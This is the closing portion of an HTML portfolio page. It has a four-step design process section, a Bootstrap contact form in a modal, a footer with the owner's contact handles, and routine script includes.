    
    </div>
    </div></div>
    <div class="container-fluid XS">
    <div class="container">
    <div class="row">
      <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12">

         <div class="Dx3">
          <img src="Ai/CD3.png" alt="speedometer" > </div> 
          <div class="FNT">    
          <h5 class="font-thin">Listening to<span class="lead"><br/>your needs</span> </h5><br/>
      <p class="lead">
        The first stage</br> is to meet with</br> the client and</br> discuss the</br> needs and </br>expectations</br> of the new </br>product.</p>
      </div> </div>
      <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12">
         <div class="Dx3">
        
          <img src="Ai/CD1.png" alt="speedometer" > </div>
             <div class="FNT">  
      <h5 class="font-thin">Project<br/><span class="lead">discovery </span> </h5><br/>
      <p class="lead">For every new</br>  client or new </br> project we</br>  take time to </br> gather the</br>  details needed</br>  to create the</br>  best project</br>  possible.</p>
      </div></div>
      <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12">


         <div class="Dx3">
       
          <img src="Ai/CD2.png" alt="speedometer" > </div>
             <div class="FNT">  
      <h5 class="font-thin">Storming<br/> <span class="lead">our brains</span> </h5><br/>
      <p class="lead">With every</br>  new project</br>  we want to</br> create a new </br> piece of</br>  design that</br>  will express </br> the story of</br>  our client.</p>
      </div></div>
      
      <div class="col-lg-3 col-md-3 col-sm-12">
         <div class="Dx3">
      
          <img src="Ai/CD.png" alt="speedometer" ></div>
             <div class="FNT">  
      <h5 class="font-thin">Getting<br/><span class="lead">there</span> </h5><br/>
      <p class="lead">After finishing <br/>the concept<br/> and everybody<br/> is happy, it`s<br/> time to put the <br/>developers to<br/> work..</p><br/><br/><br/>
      </div></div></div></div></div><br/><br/><br/></div></div></div>



 <div id="myheading5"></div>
        <div class="FOT" id="div6">
          <div class="container"><br/><br/><br/>
          <a><button class="btn btn-custom TOPx0x" data-target="#myModal5" data-toggle="modal">Contact Us</button></a> 

                <div class="modal fade" id="myModal5" tabindex="-1" role="dialog" area-labelledby="myModalLabel" aria-hidden="true">
            <div class="modal-dialog">
              <div class="modal-content">
                <div class="modal-header">
                 
                  <button type="button" class="close" data-dismiss="modal" aria-label="Close" <span aria-hidden="true"> &times; </span></button>  
                    <h4 class="modal-tittle" id="myModalLabel"> <strong>New Message</strong> </h4>
                      </div>
                      <div class="modal-body"> 
                        <form>
                          <div class="form-group">
                          <input type="text" placeholder="Enter Name"class="form-control" id="recipient-name"> 
                          </div>
                           <div class="form-group">
                  
                              <input type="text"   placeholder="Enter Email" class="form-control" id="recipient-name"> 
                          </div>   

                         <div class="form-group">
                            <label for="message-text" class="control-label"> Message:</label>
                            <textarea class="form-control" id="message-text">
                            </textarea> 
                          </div>
                        </form>
                      </div>
                      <div class="modal-footer"> <button type="button" class="btn btn-Default" data-dismiss="modal"> Send</button>
                    </div>
                  </div>
                </div>
             </div>

           <br/><br/><br/><br/>
                  <div class="row">
          <div class="col-lg-3 col-md-3 col-sm-2 col-lg-12" >
                  <img src="Ai/S1.png" alt="CC">  
                  <h5>(+91) 9897989732 </h5>  </div>            
            <div class="col-lg-3 col-md-3 col-sm-2 col-lg-12"><img src="Ai/S3.png" alt="CC">
                <h5>@002ajay </h5>    </div>
        <div class="col-lg-3 col-md-3 col-sm-2 col-lg-12"><img src="Ai/S2.png" alt="CC">
            <h5>fb/ajaysinghbisht002 </h5>    </div>
          <div class="col-lg-3 col-md-3 col-sm-2 col-lg-12"><img src="Ai/S.png"alt="CC">
                  <h5>Dehradun </h5>  </div>  
                </div>
        </div>
              <br/><br/>
               <div class="FOTx">
                  <center>
                  <img src="Ai/LogoFot.png">
                  </center>
                </div>
             <h3> GitHub | Issues | Changelog | Twitter <h3>

                <p>  Made by YOOtheme with love and caffeine.<br/>
                  Licensed under MIT license.<p>

              <br/>
                <a href="#" onclick="return false;" onmousedown="resetScroller('myheading');" >
             <button class="btn btn-custom BTM">TOP</button></a> 
              <center><h2>© 2015 All rights reserved </h2></center><br/>
<br/><br/></div></div>
        <script src="jquery.min.js"></script>
          <script src="js/bootstrap.min.js"></script>
          <script src="js/docs.min.js"></script>
          <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
          <script src="js/ie10-viewport-bug-workaround.js"></script>
          <script>
        $('.dropdown').hover(function()    {
          $('.dropdown-toggle',this).trigger('click');
        } );
        </script>
        </body>
      </html>
